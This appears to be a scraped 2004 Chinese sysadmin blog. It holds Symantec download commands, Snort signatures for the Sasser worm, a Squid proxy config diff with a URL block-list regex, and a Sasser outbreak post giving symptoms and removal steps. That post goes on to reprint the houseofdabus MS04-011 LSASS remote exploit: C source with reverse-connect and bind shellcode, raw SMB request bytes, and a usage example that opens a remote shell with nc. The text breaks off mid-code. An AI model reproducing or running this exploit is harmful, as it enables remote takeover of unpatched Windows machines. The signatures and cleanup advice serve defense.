Server/2003 ServerSymantec AntiVirus Scan Engine for Windows NT Server 4.0Symantec Antivirus for Bluecoat Security Gateway for Windows 2000 Server/2003 ServerSymantec Antivirus for Clearswift MIMESweeper for Windows 2000 Server/2003 ServerSymantec Antivirus for Microsoft ISA Server for Windows 2000 Server/2003 ServerSymantec Mail Security for Microsoft Exchange Server 4.xSymantec Web Security (WinNT/2000)pcAnywhere32 7.5 and higher for WinNT -- ---== 上帝认证 ==---发信人: KCN (毒中之毒~life so hard), 信区: BoardManager标 题: Re: 增加了版面管理困难度发信站: BBS 水木清华站 (Mon Dec 29 14:33:45 2003), 转信 windtear的人品是可信的。恩...※ 来源:·BBS 水木清华站 smth.org·[FROM: 166.111.154.35]Solution 1.wget -N -nd -nH http://securityresponse.symantec.com/avcenter/download/pages/US-NAVCE.htmlSolution 2.# 2004.01.06 remove#wget -r http://securityresponse.symantec.com/avcenter/download/pages/US-NAVCE.html --base="http://securityresponse.symantec.com/avcenter/download/us-files/" -c -A *i32.exe,*x86.exe,vdb,US-NAVCE.html -N -nd -nH -R html,txt,nsf -l 1 # changes,US-N95.html -N-q More...Posted by windtear at 7:10 PM
W32/Sasser a and b SNORT Sigs 我爱网络
W32/Sasser a and b SNORT Sigsby Martin Overton <martin@arachnophiliac.com>Hi,To save my SNORT sigs board going into meltdown, I sm posting my Sassersnort sigs here for all interested parties.alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"W32/Sasser.worm.a[NAI])"; content:"|BC 3B 74 0B 50 8B 3D E8 46 A7 3D 09 85 B8 F8 CD 76 40DE 7C 5B 5C D7 2A A8 E8 58 75 62 96 25 24|"; classtype:misc-activity;rev:1;)alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"W32/Sasser.worm.b[NAI])"; content:"|58 BC 0C FF 59 57 32 31 BD EC 34 64 6E D6 E3 8D 65 0468 58 62 79 DF D8 2C 25 6A B5 28 BA 13 74|"; classtype:misc-activity;rev:1;)Regards,Martin Overton--Anti-Malware Specialist - WildList Reporter - AVIEN Charter memberElectronic Ephemera - Hoax FAQ http://arachnophiliac.com/hoaxArachnid and Snake Wrangler - http://arachnophiliac.com/burrow/home.htmPGP key - http://arachnid.homeip.net/papers/other/MartinOverton.ascQFTD='Never could any increase of comfort or security be a sufficient goodto be bought at the price of liberty.' - Hilaire Belloc More...Posted by windtear at 3:16 PM
May 2, 2004
SquidNT squid.conf.diff 我爱网络
-----> squid.conf.diff--- squid.conf.default Sat Feb 28 17:18:40 2004+++ squid.conf Sun May 2 19:37:44 2004@@ -51,6 +51,7 @@ # #Default: # http_port 3128+http_port 5251 # TAG: https_port # Note: This option is only available if Squid is rebuilt with the@@ -121,6 +122,7 @@ # #Default: # htcp_port 4827+htcp_port 0 # TAG: mcast_groups # This tag specifies a list of multicast groups which your server@@ -171,6 +173,7 @@ #Default: # udp_incoming_address 0.0.0.0 # udp_outgoing_address 255.255.255.255+udp_incoming_address 166.111.XXX.YY # OPTIONS WHICH AFFECT THE NEIGHBOR SELECTION ALGORITHM@@ -322,6 +325,7 @@ # #Default: # none+cache_peer 166.111.XXX.YYY sibling 5251 3130 # TAG: cache_peer_domain # Use to limit the domains for which a neighbor cache will be@@ -431,6 +435,7 @@ # list this option multiple times. #We recommend you to use at least the following line. hierarchy_stoplist cgi-bin ?+hierarchy_stoplist hotmail.com msn.com # TAG: no_cache # A list of ACL elements which, if matched, cause the request to@@ -444,6 +449,12 @@ acl QUERY urlpath_regex cgi-bin \? no_cache deny QUERY +acl thu-all dst 166.111.0.0/16+no_cache deny thu-all+acl alumni-chinaren url_regex ^http://alumni.chinaren.com/+no_cache deny alumni-chinaren+acl nmc_gov_cn url_regex ^http://www.nmc.gov.cn/+no_cache deny nmc_gov_cn # OPTIONS WHICH AFFECT THE CACHE SIZE # -----------------------------------------------------------------------------@@ -481,6 +492,7 @@ # #Default: # cache_mem 8 MB+cache_mem 64 MB # TAG: cache_swap_low (percent, 0-100) # TAG: cache_swap_high (percent, 0-100)@@ -585,6 +597,7 @@ # #Default: # cache_replacement_policy lru+cache_replacement_policy heap LFUDA # TAG: memory_replacement_policy # The memory replacement policy parameter determines which@@ -594,6 +607,7 @@ # #Default: # memory_replacement_policy lru+memory_replacement_policy heap LFUDA # LOGFILE PATHNAMES AND CACHE DIRECTORIES@@ -700,6 +714,7 @@ # #Default: # cache_dir ufs c:/squid/var/cache 100 16 256+cache_dir ufs c:/squid/var/cache 3000 16 256 # TAG: cache_access_log # Logs the client request activity. Contains an entry for@@ -707,6 +722,7 @@ # #Default: # cache_access_log c:/squid/var/logs/access.log+cache_access_log c:/squid/var/logs/access.log # TAG: cache_log # Cache logging file. This is where general information about@@ -715,6 +731,7 @@ # #Default: # cache_log c:/squid/var/logs/cache.log+cache_log c:/squid/var/logs/cache.log # TAG: cache_store_log # Logs the activities of the storage manager. Shows which@@ -725,6 +742,7 @@ # #Default: # cache_store_log c:/squid/var/logs/store.log+cache_store_log none # TAG: cache_swap_log # Location for the cache "swap.log." This log file holds the@@ -862,6 +880,7 @@ # #Default: # ftp_user Squid@+ftp_user Squid@ipcn.org # TAG: ftp_list_width # Sets the width of ftp listings. This should be set to fit in@@ -968,6 +987,7 @@ # #Default: # none+dns_nameservers 166.111.8.28 166.111.8.29 # TAG: hosts_file # Location of the host-local IP name-address associations@@ -1261,8 +1281,12 @@ #auth_param ntlm use_ntlm_negotiate off #auth_param basic program <uncomment and complete this line> auth_param basic children 5-auth_param basic realm Squid proxy-caching web server+#auth_param basic realm Squid proxy-caching web server+auth_param basic realm windtear proxy server auth_param basic credentialsttl 2 hours+#authenticate_program /usr/lib/squid/ncsa_auth /etc/squid/passwd+#auth_param basic program /usr/lib/squid/ncsa_auth /etc/squid/passwd+auth_param basic program c:/squid/libexec/ncsa_auth.exe c:/squid/etc/passwd # TAG: authenticate_cache_garbage_interval # The time period between garbage collection across the username cache.@@ -1454,6 +1478,28 @@ refresh_pattern ^ftp: 1440 20% 10080 refresh_pattern ^gopher: 1440 0% 1440 refresh_pattern . 0 20% 4320+refresh_pattern -i .html 1440 90% 129600 reload-into-ims+refresh_pattern -i .shtml 1440 90% 129600 reload-into-ims+refresh_pattern -i .hml 1440 90% 129600 reload-into-ims+refresh_pattern -i .gif 1440 90% 129600 reload-into-ims+refresh_pattern -i .swf 1440 90% 129600 reload-into-ims+refresh_pattern -i .jpg 1440 90% 129600 reload-into-ims+refresh_pattern -i .png 1440 90% 129600 reload-into-ims+refresh_pattern -i .bmp 1440 90% 129600 reload-into-ims+refresh_pattern -i .js 1440 90% 129600 reload-into-ims+refresh_pattern -i .cab 1440 90% 129600 reload-into-ims+refresh_pattern -i .zip 1440 90% 129600 reload-into-ims+refresh_pattern -i .exe 1440 90% 129600 reload-into-ims+refresh_pattern -i .rar 1440 90% 129600 reload-into-ims+refresh_pattern -i .doc 1440 90% 129600 reload-into-ims+refresh_pattern -i .ppt 1440 90% 129600 reload-into-ims+refresh_pattern -i .xls 1440 90% 129600 reload-into-ims+refresh_pattern -i .rpm 1440 90% 129600 reload-into-ims+refresh_pattern -i .deb 1440 90% 129600 reload-into-ims+refresh_pattern -i .avi 1440 90% 129600 reload-into-ims+refresh_pattern -i .rm 1440 90% 129600 reload-into-ims+refresh_pattern -i .wmv 1440 90% 129600 reload-into-ims+refresh_pattern -i .rmvb 1440 90% 129600 reload-into-ims # TAG: quick_abort_min (KB) # TAG: quick_abort_max (KB)@@ -1776,15 +1822,35 @@ #Examples: #acl myexample dst_as 1241 #acl password proxy_auth REQUIRED+acl ipcnauth proxy_auth REQUIRED #acl fileupload req_mime_type -i ^multipart/form-data$ #acl javascript rep_mime_type -i ^application/x-javascript$ # #Recommended minimum configuration:+acl building src 10.35.0.0/16+acl building src 169.254.0.0/16+acl building src 172.16.0.0/12+acl building src 192.168.0.0/16+acl fromthu src 166.111.0.0/16+acl fromthu src 219.224.96.0/19+acl fromthu src 219.224.128.0/17+acl tothu dst 166.111.0.0/16+acl tothu dst 219.224.96.0/19+acl tothu dst 219.224.128.0/17+acl tolib dst 166.111.120.0/23+acl tome dst 166.111.XXX.YY+acl tome dst 166.111.XXX.YY+acl tome dst 166.111.XXX.YYY+acl tome dst 166.111.XXX.YY+acl peer src 166.111.XXX.YY+acl peer src 166.111.XXX.YY+acl peer src 166.111.XXX.YYY+acl peer src 166.111.XXX.YY acl all src 0.0.0.0/0.0.0.0 acl manager proto cache_object acl localhost src 127.0.0.1/255.255.255.255 acl to_localhost dst 127.0.0.0/8-acl SSL_ports port 443 563+acl SSL_ports port 443 563 1863 acl Safe_ports port 80 # http acl Safe_ports port 21 # ftp acl Safe_ports port 443 563 # https, snews@@ -1796,6 +1862,12 @@ acl Safe_ports port 591 # filemaker acl Safe_ports port 777 # multiling http acl CONNECT method CONNECT+#限制最多连接20个+acl my_deny_maxconn maxconn 10+acl ip_no_need_auth src "c:/squid/etc/ip_no_need_auth.txt"+acl porn url_regex -i (adultos|adultsight|adultsite|adultsonly|adultweb|blow-?job|bondage|centerfold|cumshot|cyberlust|cybercore|hardcore|incest|masturbat|obscene|pedophil|pedofil|playmate|pornstar|sexdream|showgirl|softcore|striptease)+acl porn url_regex -i (^|[-.\?+=/_0-9])(all|big|cute|cyber|fake|firm|hard|huge|little|mega|mini|naughty|new|old|pure|real|small|serious|soft|super|tiny|young)?(anal|babe|bharath|boob|breast|busen|busty|clit|cum|cunt|dick|fetish|fuck|hooter|lez|lust|naked|nude|oral|orgy|porno?|pupper|pussy|rotten|sex|shit|smutpump|teen|tit|topp?les|vixen|xxx)s?(cafe|site|surf|surfing|web|website)?([-.\?+=/_0-9]|$)+acl porn url_regex -i (^|[-.\?+=/_0-9])(all|big|cute|cyber|fake|firm|hard|huge|little|mega|mini|naughty|new|old|pure|real|small|serious|soft|super|tiny|young)(girl|virgin)s?(cafe|site|surf|surfing|web|website)?([-.\?+=/_0-9]|$) # TAG: http_access # Allowing or Denying access based on defined access lists@@ -1842,6 +1914,18 @@ #http_access allow our_networks # And finally deny all other access to this proxy+http_access allow localhost+http_access allow building+http_access allow tome+http_access allow ip_no_need_auth+#限制最多连接20个+http_access deny my_deny_maxconn+http_access deny tolib+http_access allow tothu fromthu+http_access deny tothu+#http_access allow ipcnauth+http_access allow !porn+#http_access allow fromthu http_access deny all # TAG: http_reply_access@@ -2008,6 +2092,10 @@ # #Default: # reply_body_max_size 0 allow all+reply_body_max_size 0 allow building+reply_body_max_size 0 allow ip_no_need_auth+reply_body_max_size 20000000 allow all+#reply_body_max_size 20000000 allow ipcnauth # ADMINISTRATIVE PARAMETERS@@ -2019,6 +2107,7 @@ # #Default: # cache_mgr webmaster+cache_mgr windtear@ipcn.org # TAG: cache_effective_user # TAG: cache_effective_group@@ -2049,6 +2138,7 @@ # #Default: # none+visible_hostname test.nt.proxy.ipcn.org # TAG: unique_hostname # If you want to have multiple machines with the same@@ -2274,6 +2364,8 @@ # #Default: # none+deny_info ERR_PORN_DENIED porn all+deny_info ERR_ACCESS_DENIED lib all # TAG: memory_pools on|off # If set, Squid will keep pools of allocated (but unused) memory@@ -2332,6 +2424,7 @@ # #Default: # log_icp_queries on+log_icp_queries off # TAG: icp_hit_stale on|off # If you want to return ICP_HIT for stale cache objects, set this@@ -2419,6 +2512,9 @@ # #Default: # none+cachemgr_passwd none info idns+cachemgr_passwd disable shutdown offline_toggle+cachemgr_passwd yoursecret all # TAG: store_avg_object_size (kbytes) # Average object size, used to estimate number of objects your@@ -2672,6 +2768,7 @@ # #Default: # error_directory c:/squid/share/errors/English+error_directory c:/squid/share/errors/chs # TAG: maximum_single_addr_tries # This sets the maximum number of connection attempts for a@@ -2695,6 +2792,7 @@ # #Default: # snmp_port 3401+snmp_port 0 # TAG: snmp_access # Allowing or denying access to the SNMP port.-----> grep ^+ squid.conf.diff% grep ^+ squid.conf.diff +++ squid.conf Sun May 2 19:37:44 2004+http_port 5251+htcp_port 0+udp_incoming_address 166.111.XXX.YY+cache_peer 166.111.XXX.YYY sibling 5251 3130+hierarchy_stoplist hotmail.com msn.com+acl thu-all dst 166.111.0.0/16+no_cache deny thu-all+acl alumni-chinaren url_regex ^http://alumni.chinaren.com/+no_cache deny alumni-chinaren+acl nmc_gov_cn url_regex ^http://www.nmc.gov.cn/+no_cache deny nmc_gov_cn+cache_mem 64 MB+cache_replacement_policy heap LFUDA+memory_replacement_policy heap LFUDA+cache_dir ufs c:/squid/var/cache 3000 16 256+cache_access_log c:/squid/var/logs/access.log+cache_log c:/squid/var/logs/cache.log+cache_store_log none+ftp_user Squid@ipcn.org+dns_nameservers 166.111.8.28 166.111.8.29+#auth_param basic realm Squid proxy-caching web server+auth_param basic realm windtear proxy server+#authenticate_program /usr/lib/squid/ncsa_auth /etc/squid/passwd+#auth_param basic program /usr/lib/squid/ncsa_auth /etc/squid/passwd+auth_param basic program c:/squid/libexec/ncsa_auth.exe c:/squid/etc/passwd+refresh_pattern -i .html 1440 90% 129600 reload-into-ims+refresh_pattern -i .shtml 1440 90% 129600 reload-into-ims+refresh_pattern -i .hml 1440 90% 129600 reload-into-ims+refresh_pattern -i .gif 1440 90% 129600 reload-into-ims+refresh_pattern -i .swf 1440 90% 129600 reload-into-ims+refresh_pattern -i .jpg 1440 90% 129600 reload-into-ims+refresh_pattern -i .png 1440 90% 129600 reload-into-ims+refresh_pattern -i .bmp 1440 90% 129600 reload-into-ims+refresh_pattern -i .js 1440 90% 129600 reload-into-ims+refresh_pattern -i .cab 1440 90% 129600 reload-into-ims+refresh_pattern -i .zip 1440 90% 129600 reload-into-ims+refresh_pattern -i .exe 1440 90% 129600 reload-into-ims+refresh_pattern -i .rar 1440 90% 129600 reload-into-ims+refresh_pattern -i .doc 1440 90% 129600 reload-into-ims+refresh_pattern -i .ppt 1440 90% 129600 reload-into-ims+refresh_pattern -i .xls 1440 90% 129600 reload-into-ims+refresh_pattern -i .rpm 1440 90% 129600 reload-into-ims+refresh_pattern -i .deb 1440 90% 129600 reload-into-ims+refresh_pattern -i .avi 1440 90% 129600 reload-into-ims+refresh_pattern -i .rm 1440 90% 129600 reload-into-ims+refresh_pattern -i .wmv 1440 90% 129600 reload-into-ims+refresh_pattern -i .rmvb 1440 90% 129600 reload-into-ims+acl ipcnauth proxy_auth REQUIRED+acl building src 10.35.0.0/16+acl building src 169.254.0.0/16+acl building src 172.16.0.0/12+acl building src 192.168.0.0/16+acl fromthu src 166.111.0.0/16+acl fromthu src 219.224.96.0/19+acl fromthu src 219.224.128.0/17+acl tothu dst 166.111.0.0/16+acl tothu dst 219.224.96.0/19+acl tothu dst 219.224.128.0/17+acl tolib dst 166.111.120.0/23+acl tome dst 166.111.XXX.YY+acl tome dst 166.111.XXX.YY+acl tome dst 166.111.XXX.YYY+acl tome dst 166.111.XXX.YY+acl peer src 166.111.XXX.YY+acl peer src 166.111.XXX.YY+acl peer src 166.111.XXX.YYY+acl peer src 166.111.XXX.YY+acl SSL_ports port 443 563 1863+#限制最多连接20个+acl my_deny_maxconn maxconn 10+acl ip_no_need_auth src "c:/squid/etc/ip_no_need_auth.txt"+acl porn url_regex -i (adultos|adultsight|adultsite|adultsonly|adultweb|blow-?job|bondage|centerfold|cumshot|cyberlust|cybercore|hardcore|incest|masturbat|obscene|pedophil|pedofil|playmate|pornstar|sexdream|showgirl|softcore|striptease)+acl porn url_regex -i (^|[-.\?+=/_0-9])(all|big|cute|cyber|fake|firm|hard|huge|little|mega|mini|naughty|new|old|pure|real|small|serious|soft|super|tiny|young)?(anal|babe|bharath|boob|breast|busen|busty|clit|cum|cunt|dick|fetish|fuck|hooter|lez|lust|naked|nude|oral|orgy|porno?|pupper|pussy|rotten|sex|shit|smutpump|teen|tit|topp?les|vixen|xxx)s?(cafe|site|surf|surfing|web|website)?([-.\?+=/_0-9]|$)+acl porn url_regex -i (^|[-.\?+=/_0-9])(all|big|cute|cyber|fake|firm|hard|huge|little|mega|mini|naughty|new|old|pure|real|small|serious|soft|super|tiny|young)(girl|virgin)s?(cafe|site|surf|surfing|web|website)?([-.\?+=/_0-9]|$)+http_access allow localhost+http_access allow building+http_access allow tome+http_access allow ip_no_need_auth+#限制最多连接20个+http_access deny my_deny_maxconn+http_access deny tolib+http_access allow tothu fromthu+http_access deny tothu+#http_access allow ipcnauth+http_access allow !porn+#http_access allow fromthu+reply_body_max_size 0 allow building+reply_body_max_size 0 allow ip_no_need_auth+reply_body_max_size 20000000 allow all+#reply_body_max_size 20000000 allow ipcnauth+cache_mgr windtear@ipcn.org+visible_hostname test.nt.proxy.ipcn.org+deny_info ERR_PORN_DENIED porn all+deny_info ERR_ACCESS_DENIED lib all+log_icp_queries off+cachemgr_passwd none info idns+cachemgr_passwd disable shutdown offline_toggle+cachemgr_passwd yoursecret all+error_directory c:/squid/share/errors/chs+snmp_port 0[相关文章]http://www.smth.edu.cn/pc/pccon.php?id=10&nid=26797&s=all More...Posted by windtear at 7:35 PM
May 1, 2004
针对 RPC 漏洞的 W32.Sasser.Worm 病毒爆发 我爱网络
针对 RPC 漏洞的 W32.Sasser.Worm 病毒爆发-----> ccert announcementCCERT关于微软系列漏洞的安全公告(2004-005) 2004-04-16 http://www.ccert.edu.cn/announce/show.php?handle=101-----> orig of my articlesMICROSOFT SECURITY UPDATES ALERT April 13, 2004 - Windows Security Updates for April 2004W2K_CHS 5 updates (20040414) up to blueink-----> demo and solution sample发信人: bu1 (一介布衣), 信区: Virus标 题: ---===遭遇新病毒===---发信站: BBS 水木清华站 (Sat May 1 10:35:01 2004), 站内今天早上8点多开机20分钟内即被感染,病毒首先建立文件C:\WINNT\system32\31131_up.exe并执行。然后建立文件:C:\WINNT\avserve.exe,并在注册表中建立HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/avserve.exe项。病毒在本机启动3000多tcp 端口对外扫描tcp 445。待毒计算机的网络应用可能无法正常打开。1. 在处理任务管理器中关闭病毒进程,2. 下载系统补丁或在线升级,3. 拔网线(如果是在线升级本步可免)4. 删除上述两个病毒文件和注册表项,5. 升级系统(如果是在线升级本步可免)。-----> demo and solution染毒计算机的主要症状为:(1)进程中出现 avserve.exe 和 *****_up.exe,占用大量资源; 其中*****为从0~65535之间的随机数字(2)出现LSA Shell错误;(3)导致系统进程lsass.exe错误,并进而导致计算机强迫重启;(4)有网友反馈计算机的管理员权限帐户口令被修改(未证实)。目前的主要应对措施为:(1)安装微软的安全更新 KB837001,KB828741,KB835732; 推荐先下载到本地计算机上,再断网安装! 请注意版面上整理的分流FTP列表——暂时置底!(2)将系统时间改为若干年前,可以使强迫关机时间变得很长(权宜之计);(3)通过安装防火墙软件关闭计算机的445端口——安装补丁后不必要;(4)终止avserve和*****_up进程,并删除注册表中与avserve和_up相关的健值;(5)断网删除硬盘上以avserve或_up为关键字分别搜索到的.exe和.pf文件; 注:如果已经终止了病毒的进程,则无须进入安全模式执行该操作(6)敬请关注本版最新动态。备注:系统管理员密码被更改导致没有任何办法进入系统,请参见 WindowsApp版置底的文章-----> 关闭445端口的方法,把一下内容存成a.reg文件,然后双击导入到注册表中,重启系统--------文件开始------------REGEDIT4[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]"SMBDeviceEnabled"=dword:00000000-------文件结束------------------> symantec W32.Sasser.Wormhttp://securityresponse.symantec.com/avcenter/venc/data/w32.sasser.worm.htmlW32.Sasser is a worm that attempts to send code that exploits the MS04-011 vulnerability. The worm spreads by randomly scanning IP addresses for vulnerable systems. The presence of the following files is an indication of infection:%windows%\avserve.exeThe worm then adds one of the following registry values:"avserve.exe"=%windows%\avserve.exeTo the registry keys:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunThe worm opens ftp port 5554, and randomly scans IP addresses for vulnerable systems. Symantec Security Response is continuing to analyze the worm and will update this page as information becomes available.Type: Worm Infection Length: 15872 Systems Affected: Windows 2000, Windows NT, Windows Server 2003, Windows XP -----> exploit HOD-ms04011-lsasrv-expl.c/* HOD-ms04011-lsasrv-expl.c: * * MS04011 Lsasrv.dll RPC buffer overflow remote exploit * Version 0.1 coded by * * * .::[ houseofdabus ]::. * * * ------------------------------------------------------------------- * Usage: * * expl <target> <victim IP> <bindport> [connectback IP] [options] * * Targets: * 0 [0x01004600]: WinXP Professional [universal] lsass.exe * 1 [0x7515123c]: Win2k Professional [universal] netrap.dll * 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll * * Options: * -t: Detect remote OS: * Windows 5.1 - WinXP * Windows 5.0 - Win2k * ------------------------------------------------------------------- * * Tested on * - Windows XP Professional SP0 English version * - Windows XP Professional SP0 Russian version * - Windows XP Professional SP1 English version * - Windows XP Professional SP1 Russian version * - Windows 2000 Professional SP2 English version * - Windows 2000 Professional SP2 Russian version * - Windows 2000 Professional SP4 English version * - Windows 2000 Professional SP4 Russian version * - Windows 2000 Advanced Server SP4 English version * - Windows 2000 Advanced Server SP4 Russian version * * * Example: * * C:\HOD-ms04011-lsasrv-expl 0 192.168.1.10 4444 -t * * MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 * --- Coded by .::[ houseofdabus ]::. --- * * [*] Target: IP: 192.168.1.10: OS: WinXP Professional [universal] lsass.exe * [*] Connecting to 192.168.1.10:445 ... OK * [*] Detecting remote OS: Windows 5.0 * * * C:\HOD-ms04011-lsasrv-expl 1 192.168.1.10 4444 * * MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 * --- Coded by .::[ houseofdabus ]::. --- * * [*] Target: IP: 192.168.1.10: OS: Win2k Professional [universal] netrap.dll * [*] Connecting to 192.168.1.10:445 ... OK * [*] Attacking ... OK * * C:\nc 192.168.1.10 4444 * Microsoft Windows 2000 [Version 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32> * * * * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission to * do so. */#include <windows.h>#pragma comment(lib, "ws2_32")// reverse shellcodeunsigned char reverseshell[] ="\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA""\xEB\x05\xE8\xEB\xFF\xFF\xFF""\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12""\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99""\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12""\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99""\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9""\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D""\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA""\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32""\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10""\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8""\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66""\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5""\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8""\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A""\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12""\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A""\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C""\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33""\xF9\x7E\xE0\x5F\xE0";// bind shellcodeunsigned char bindshell[] ="\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA""\xEB\x05\xE8\xEB\xFF\xFF\xFF""\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12""\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A""\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6""\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D""\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A""\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58""\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0""\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41""\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B""\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D""\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA""\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10""\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF""\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8""\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79""\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C""\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59""\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD""\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC""\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5""\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6""\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0""\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED""\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";char req1[] ="\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE""\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F""\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02""\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F""\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70""\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30""\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54""\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";char req2[] ="\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE""\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00""\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E""\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00""\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00""\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00""\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00""\x2E\x00\x30\x00\x00\x00\x00\x00";char req3[] 